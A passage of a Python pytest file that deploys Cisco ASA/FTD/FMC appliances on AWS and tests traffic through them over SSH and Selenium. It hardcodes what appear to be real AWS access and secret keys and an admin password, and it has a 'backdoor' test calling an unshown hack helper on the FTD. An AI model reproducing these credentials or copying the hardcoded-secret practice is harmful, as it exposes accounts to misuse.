pytest_ASA_New(EC2INSTANCE):
image-id: ami-01cab33393210e391
instance-type: c5.xlarge
key-name: testDog
security-group-ids: Test-1-169_SG_Sec_MGMT
count: 1
subnet-id: Test-1-169_SUB_Sec_MGMT
associate-public-ip-address: None
private-ip-address: 20.0.250.12
user-data: file://pytest_day0.txt
action:
query_from:
- Test-1-169_SUB_Sec_MGMT
- Test-1-169_SG_Sec_MGMT
cleanUP: True
pytest_NWInterface_ASA_New(NETWORK_INTERFACE):
subnet-id: Test-1-169_SUB_Sec_DATA
description: Test-1-169 Data Network for ASA
groups: Test-1-169_SG_Sec_DATA
private-ip-address: 20.0.1.102
action:
query_from:
- Test-1-169_SG_Sec_DATA
- Test-1-169_SUB_Sec_DATA
cleanUP: True
pytest_NWInterface_ASA_Bind(BIND):
network-interface-id: pytest_NWInterface_ASA_New
instance-id: pytest_ASA_New
device-index: 1
action:
bind_to:
- pytest_NWInterface_ASA_New
- pytest_ASA_New
cleanUP: True
'''
setting = {}
cfg = {"default": {"region": "us-west-1", "output": "yaml"}}
cda = {"default": {"aws_access_key_id": "AKIAWMUP3NI4ET7YU6AN",
"aws_secret_access_key": "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"}}
setting["config"] = cfg
setting["credentials"] = cda
obj = aws(setting, record=False)
atexit.register(obj.close)
obj.load_deployment(content=cont)
obj.start_deployment()
# asa_ip = obj.fetch_address("Auto_ASA_New")
# asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
#
# load_asa_config(asa_address, debug=False)
# @pytest.mark.addftd
# def test_FTD():
# cont = '''
# Pytest-EC2-FTD(EC2INSTANCE):
# image-id: Pytest-AMI-FTD
# instance-type: d2.2xlarge
# key-name: testDog
# security-group-ids: Test-1-169_SG_Sec_MGMT
# count: 1
# subnet-id: Test-1-169_SUB_Sec_MGMT
# associate-public-ip-address: None
# private-ip-address: 20.0.250.12
# action:
# query_from:
# - Test-1-169_SUB_Sec_MGMT
# - Test-1-169_SG_Sec_MGMT
# bind_to:
# - Pytest-AMI-FTD
# cleanUP: True
#
# Pytest-AMI-FTD(AMICOPY):
# source-image-id: ami-05a840fdc851de7cb
# source-region: us-east-2
# region: us-west-1
# name: ftdv
# action:
# cleanUP: True
#
# Pytest_SUB_Sec_2_DATA(SUBNET):
# vpc-id: Test-1-169_VPC_Sec
# cidr-block: 20.0.2.0/24
# availability-zone: '{Test-1-169_SUB_App_1_MGMT}'
# action:
# query_from:
# - Test-1-169_VPC_Sec
# - Test-1-169_SUB_App_1_MGMT
# cleanUP: True
# Pytest_SUB_Sec_3_DATA(SUBNET):
# vpc-id: Test-1-169_VPC_Sec
# cidr-block: 20.0.3.0/24
# availability-zone: '{Test-1-169_SUB_App_1_MGMT}'
# action:
# query_from:
# - Test-1-169_VPC_Sec
# - Test-1-169_SUB_App_1_MGMT
# cleanUP: True
#
# Pytest_NWInterface_FTD1(NETWORK_INTERFACE):
# subnet-id: Test-1-169_SUB_Sec_DATA
# description: pytest Data Network for ASA
# groups: Test-1-169_SG_Sec_DATA
# private-ip-address: 20.0.1.102
# action:
# query_from:
# - Test-1-169_SUB_Sec_DATA
# - Test-1-169_SG_Sec_DATA
# cleanUP: True
# Pytest_NWInterface_FTD2(NETWORK_INTERFACE):
# subnet-id: Pytest_SUB_Sec_2_DATA
# description: Test-1-169 Data Network2 for ASA
# groups: Test-1-169_SG_Sec_DATA
# private-ip-address: 20.0.2.102
# action:
# query_from:
# - Test-1-169_SG_Sec_DATA
# bind_to:
# - Pytest_SUB_Sec_2_DATA
# cleanUP: True
# Pytest_NWInterface_FTD3(NETWORK_INTERFACE):
# subnet-id: Pytest_SUB_Sec_3_DATA
# description: Test-1-169 Data Network3 for ASA
# groups: Test-1-169_SG_Sec_DATA
# private-ip-address: 20.0.3.102
# action:
# query_from:
# - Test-1-169_SG_Sec_DATA
# bind_to:
# - Pytest_SUB_Sec_3_DATA
# cleanUP: True
#
# Pytest_NWInterface_FTD_1_Bind(BIND):
# network-interface-id: Pytest_NWInterface_FTD1
# instance-id: Pytest-EC2-FTD
# device-index: 1
# action:
# bind_to:
# - Pytest_NWInterface_FTD1
# - Pytest-EC2-FTD
# cleanUP: True
# Pytest_NWInterface_FTD_2_Bind(BIND):
# network-interface-id: Pytest_NWInterface_FTD2
# instance-id: Pytest-EC2-FTD
# device-index: 2
# action:
# bind_to:
# - Pytest_NWInterface_FTD2
# - Pytest-EC2-FTD
# cleanUP: True
# Pytest_NWInterface_FTD_3_Bind(BIND):
# network-interface-id: Pytest_NWInterface_FTD3
# instance-id: Pytest-EC2-FTD
# device-index: 3
# action:
# bind_to:
# - Pytest_NWInterface_FTD3
# - Pytest-EC2-FTD
# cleanUP: True
# '''
# obj = aws(debug=False)
# atexit.register(obj.close)
#
# obj.load_deployment(content=cont)
# obj.start_deployment()
#
#
# @pytest.mark.addfmc
# def test_FMC():
# cont = '''
# Pytest-EC2-FMC(EC2INSTANCE):
# image-id: Pytest-AMI-FMC
# instance-type: d2.2xlarge
# key-name: testDog
# security-group-ids: Test-1-169_SG_Sec_MGMT
# count: 1
# subnet-id: Test-1-169_SUB_Sec_MGMT
# associate-public-ip-address: None
# private-ip-address: 20.0.250.13
# action:
# query_from:
# - Test-1-169_SUB_Sec_MGMT
# - Test-1-169_SG_Sec_MGMT
# bind_to:
# - Pytest-AMI-FMC
# cleanUP: True
#
# Pytest-AMI-FMC(AMICOPY):
# source-image-id: ami-06aac12eabffe610d
# source-region: us-east-2
# region: us-west-1
# name: fmcv
# action:
# cleanUP: True
# '''
# obj = aws(debug=True)
# atexit.register(obj.close)
#
# obj.load_deployment(content=cont)
# obj.start_deployment()
@pytest.mark.regASA
def test_reg_asa():
cont="""
Del_Test-1-169_TG_ASA(TERMINATION):
target-group-arn: Test-1-169-TG
targets: Id=Test-1-169_NWInterface_ASA
type: REGISTER
action:
query_from:
- Test-1-169-TG
- Test-1-169_NWInterface_ASA
Del_Test-1-169_TG_FTD(TERMINATION):
target-group-arn: Test-1-169-TG
targets: Id=Pytest_NWInterface_FTD1
type: REGISTER
action:
query_from:
- Test-1-169-TG
- Pytest_NWInterface_FTD1
Test-1-169_TG_Instance(REGISTER):
target-group-arn: Test-1-169-TG
targets: Id=Test-1-169_NWInterface_ASA
action:
query_from:
- Test-1-169-TG
- Test-1-169_NWInterface_ASA
bind_to:
- Del_Test-1-169_TG_FTD
- Del_Test-1-169_TG_ASA
cleanUP: True
"""
obj = aws(debug=True)
atexit.register(obj.close)
obj.load_deployment(content=cont)
obj.start_deployment()
@pytest.mark.regFTD
def test_reg_ftd():
cont = """
Del_Test-1-169_TG_ASA(TERMINATION):
target-group-arn: Test-1-169-TG
targets: Id=Test-1-169_NWInterface_ASA
type: REGISTER
action:
query_from:
- Test-1-169-TG
- Test-1-169_NWInterface_ASA
Del_Test-1-169_TG_FTD(TERMINATION):
target-group-arn: Test-1-169-TG
targets: Id=Pytest_NWInterface_FTD1
type: REGISTER
action:
query_from:
- Test-1-169-TG
- Pytest_NWInterface_FTD1
Test-1-169_TG_Instance(REGISTER):
target-group-arn: Test-1-169-TG
targets: Id=Pytest_NWInterface_FTD1
action:
query_from:
- Test-1-169-TG
- Pytest_NWInterface_FTD1
bind_to:
- Del_Test-1-169_TG_FTD
- Del_Test-1-169_TG_ASA
cleanUP: True
"""
obj = aws(debug=True)
atexit.register(obj.close)
obj.load_deployment(content=cont)
obj.start_deployment()
@pytest.mark.hackFTD
def test_ftd_backdoor(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
ftd_address = f"ssh -i 'testDog.pem' admin@{ftd_ip}"
ftd_hack(ftd_address)
cmd = "conf term"
res, cont = ftd_config(ftd_address, cmd)
assert "firepower(config)#" in cont
@pytest.mark.FMCreg
def test_fmc_reg(local_run):
# def test_fmc_reg():
from selenium import webdriver
from selenium.webdriver.common.by import By
#need to manually ssh login FMCv first, which help to setup admin/Cisco123!@# (default one:Cisco@13)
timer = 5
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
# fmc_ip = "52.53.155.170"
driver = webdriver.Chrome("/Users/yijunzhu/PycharmProjects/iTest/Geneve/chromedriver")
try:
driver.get(f"https://{fmc_ip}/ui/login")
driver.find_element(By.ID, "details-button").click()
driver.find_element(By.ID, "proceed-link").click()
except:
pass
time.sleep(timer)# wait, otherwise can't find bd-2
driver.get(f"https://{fmc_ip}/ui/login")
driver.find_element(By.ID, "bd-2").send_keys("admin")
driver.find_element(By.ID, "bd-5").send_keys("Cisco123!@#")
driver.find_element(By.CSS_SELECTOR, ".atomic-btn").click()
time.sleep(timer)
try:
driver.find_element(By.CSS_SELECTOR, ".atomic-btn:nth-child(2)").click()
except:
pass
time.sleep(timer)
driver.find_element(By.LINK_TEXT, "Devices").click()
time.sleep(timer)
driver.find_element(By.LINK_TEXT, "Device Management").click()
time.sleep(timer)
driver.find_element(By.CSS_SELECTOR, "#gwt-debug-device_management-add_dropdown-add .x-btn-text").click()
driver.find_element(By.ID, "gwt-debug-device_management-device-add").click()
time.sleep(timer)
driver.find_element(By.ID, "gwt-debug-device_registration-host-text_field-input").send_keys("20.0.250.12")
driver.find_element(By.ID, "gwt-debug-device_registration-display_name-text_field-input").click()
driver.find_element(By.ID, "gwt-debug-device_registration-registration_key-text_field-input").send_keys("cisco")
driver.find_element(By.ID, "gwt-debug-device_registration-access_control_policy-combobox-input").click()
time.sleep(timer)
driver.find_element(By.XPATH, '//div[text()="default_yijun"]').click()
driver.find_element(By.ID, "gwt-debug-device_registration-license_tiers-combobox-input").click()
time.sleep(timer)
driver.find_element(By.XPATH, '//div[text()="FTDv20 - Tiered (Core 4 / 8 GB)"]').click()
time.sleep(timer)
check1 = driver.find_element(By.XPATH, '//fieldset[@class=" x-fieldset x-component"]//label[text()="Malware"]')
check2 = driver.find_element(By.XPATH, '//fieldset[@class=" x-fieldset x-component"]//label[text()="Threat"]')
check3 = driver.find_element(By.XPATH, '//fieldset[@class=" x-fieldset x-component"]//label[text()="URL Filtering"]')
check1_id = str(check1.get_attribute("htmlfor"))
check2_id = str(check2.get_attribute("htmlfor"))
check3_id = str(check3.get_attribute("htmlfor"))
driver.find_element(By.ID, check1_id).click()
driver.find_element(By.ID, check2_id).click()
driver.find_element(By.ID, check3_id).click()
time.sleep(timer)
driver.find_element(By.CSS_SELECTOR, "#gwt-debug-device_registration-register-button .x-btn-text").click()
time.sleep(5)
@pytest.mark.FTDconfig
def test_ftd_config(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
ftd_address = f"ssh -i 'testDog.pem' admin@{ftd_ip}"
load_ftd_config(ftd_address, debug=False)
@pytest.mark.geneveFTD
@pytest.mark.FTDmetaserver
@pytest.mark.FTDbasic1to2
def test_Basic_PingGoogle_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
# test_reg_ftd()
# print('WAIT for FTD register', wait(90))
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
while True:
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'ping 8.8.8.8 -c 1'")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
assert "0% packet loss" in resp1
ssh.close()
@pytest.mark.geneveFTD
@pytest.mark.FTDbasic2to1
def test_Basic_PingApp_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
while True:
_, stdout, _ = ssh.exec_command(f"ping {app_ip} -c 1")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
assert "0% packet loss" in resp1
ssh.close()
@pytest.mark.geneveFTD
@pytest.mark.FTDinstall1to2
def test_apt_install_from_outside_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
while True:
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'sudo apt install net-tools'")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
while True:
_, stdout2, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'ifconfig'")
stdout2.channel.recv_exit_status()
resp2 = "".join(stdout2.readlines())
if not resp2:
continue
else:
break
assert "10.0.1.101" in resp2
ssh.close()
@pytest.mark.geneveFTD
@pytest.mark.FTDinstall2to1
def test_apt_install_from_inside_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
while True:
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'sudo apt update'")
stdout.channel.recv_exit_status()
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'sudo apt install iperf -y'")
stdout.channel.recv_exit_status()
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'sudo apt install apache2 -y'")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
while True:
_, stdout2, _ = ssh.exec_command(f"wget http://{app_ip}/index.html; ls index.html")
stdout2.channel.recv_exit_status()
resp2 = "".join(stdout2.readlines())
if not resp2:
continue
else:
break
assert "No such file or directory" not in resp2
ssh.close()
@pytest.mark.geneveFTD
@pytest.mark.FTDtcp1to2
def test_TCP23_from_outside_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
# 1. transfer server file
cmd1 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"Pytest_server.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd2).read()
# 2. run server file
cmd_k = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3\''"
os.popen(cmd_k).read()
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo screen -d -m sudo python3 Pytest_server.py\''"
os.popen(cmd3).read()
# 3. test
test = f"""
import socket
s=socket.socket()
s.connect(("{app_ip}",23))
s.send("Yijun is coming".encode())
msg = s.recv(1024)
print(msg)
"""
with open("test.py", "w+") as f:
f.write(test)
cmd4 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"test.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd4).read()
cmd5 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill python3;python3 test.py'"
resp = os.popen(cmd5).read()
assert "[Pytest]TCP:23 is back!" in resp
# # terminate server
cmd6 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo rm -rf test.py'"
os.popen(cmd6).read()
cmd7 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3\''"
os.popen(cmd7).read()
@pytest.mark.geneveFTD
@pytest.mark.FTDtcp2to1
def test_TCP23_from_inside_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
# 1. transfer server file
cmd1 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"Pytest_server.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd2).read()
# 2. run server file
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill python3;sudo screen -d -m sudo python3 Pytest_server.py'"
os.popen(cmd3).read()
# 3. test
test = f"""
import socket
s=socket.socket()
s.connect(("{app_jb_ip}",23))
s.send("Yijun is coming".encode())
msg = s.recv(1024)
print(msg)
"""
with open("test.py", "w+") as f:
f.write(test)
cmd4 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"test.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd4).read()
cmd4_2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"test.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd4_2).read()
cmd5 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3;python3 test.py\''"
resp = os.popen(cmd5).read()
assert "[Pytest]TCP:23 is back!" in resp
# # terminate server
cmd6 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo rm -rf test.py'"
os.popen(cmd6).read()
cmd6_2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo rm -rf test.py\''"
os.popen(cmd6_2).read()
cmd7 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill python3'"
os.popen(cmd7).read()
@pytest.mark.geneveFTD
@pytest.mark.FTDudpYijun
def test_UDP666_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
# 1. transfer server file
cmd1 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"Pytest_server.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd2).read()
# 2. run server file
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo screen -d -m sudo python3 Pytest_server.py\''"
os.popen(cmd3).read()
# 3. test
test = f"""
import socket
s=socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
s.sendto("Yijun is coming".encode(), ("{app_ip}", 666))
msg = s.recvfrom(1024)
print(msg[0])
"""
with open("test.py", "w+") as f:
f.write(test)
cmd4 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"test.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd4).read()
cmd5 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo python3 test.py'"
resp = os.popen(cmd5).read()
assert "[Pytest]UDP:666 is back!" in resp
# # terminate server
cmd6 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo rm -rf test.py'"
os.popen(cmd6).read()
cmd7 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3\''"
os.popen(cmd7).read()
@pytest.mark.geneveFTD
@pytest.mark.FTDudp1to2
def test_UDP_from_inside_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
# 1. transfer server file
cmd1 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"Pytest_server.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd2).read()
# 2. run server file
cmd_k = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3\''"
os.popen(cmd_k).read()
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo screen -d -m sudo python3 Pytest_server.py\''"
os.popen(cmd3).read()
# 3. test
test = f"""
import socket
s=socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
s.sendto("Yijun is coming".encode(), ("{app_ip}", 666))
msg = s.recvfrom(1024)
print(msg[0])
"""
with open("test.py", "w+") as f:
f.write(test)
cmd4 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"test.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd4).read()
cmd5 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill python3;python3 test.py'"
resp = os.popen(cmd5).read()
assert "[Pytest]UDP:666 is back!" in resp
# # terminate server
cmd6 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo rm -rf test.py'"
os.popen(cmd6).read()
cmd7 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3\''"
os.popen(cmd7).read()
@pytest.mark.geneveFTD
@pytest.mark.FTDudp2to1
def test_UDP_from_outside_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
# 1. transfer server file
cmd1 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"Pytest_server.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd2).read()
# 2. run server file
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill python3;sudo screen -d -m sudo python3 Pytest_server.py'"
os.popen(cmd3).read()
# 3. test
test = f"""
import socket
s=socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
s.sendto("Yijun is coming".encode(), ("{app_jb_ip}", 666))
msg = s.recvfrom(1024)
print(msg[0])
"""
with open("test.py", "w+") as f:
f.write(test)
cmd4 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"test.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd4).read()
cmd4_2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"test.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd4_2).read()
cmd5 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo python3 test.py; pkill python3\''"
resp = os.popen(cmd5).read()
assert "[Pytest]UDP:666 is back!" in resp
# # terminate server
cmd6 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo rm -rf test.py'"
os.popen(cmd6).read()
cmd6_2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo rm -rf test.py\''"
os.popen(cmd6_2).read()
cmd7 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill python3'"
os.popen(cmd7).read()
@pytest.mark.geneveFTD
@pytest.mark.FTDiperfudp
def test_iperf_udp_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
cmd1 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo screen -d -m sudo iperf -s -u'"
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo iperf -c {app_jb_ip} -u\''"
res = os.popen(cmd2).read()
bd = re.compile(" ([\d.]+?) (?=MBytes)").findall(res)[0]
assert float(bd) > 0
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill iperf'"
os.popen(cmd3).read()
@pytest.mark.geneveFTD
@pytest.mark.FTDiperfudpreverse
def test_iperf_udp_reverse_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
cmd1 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
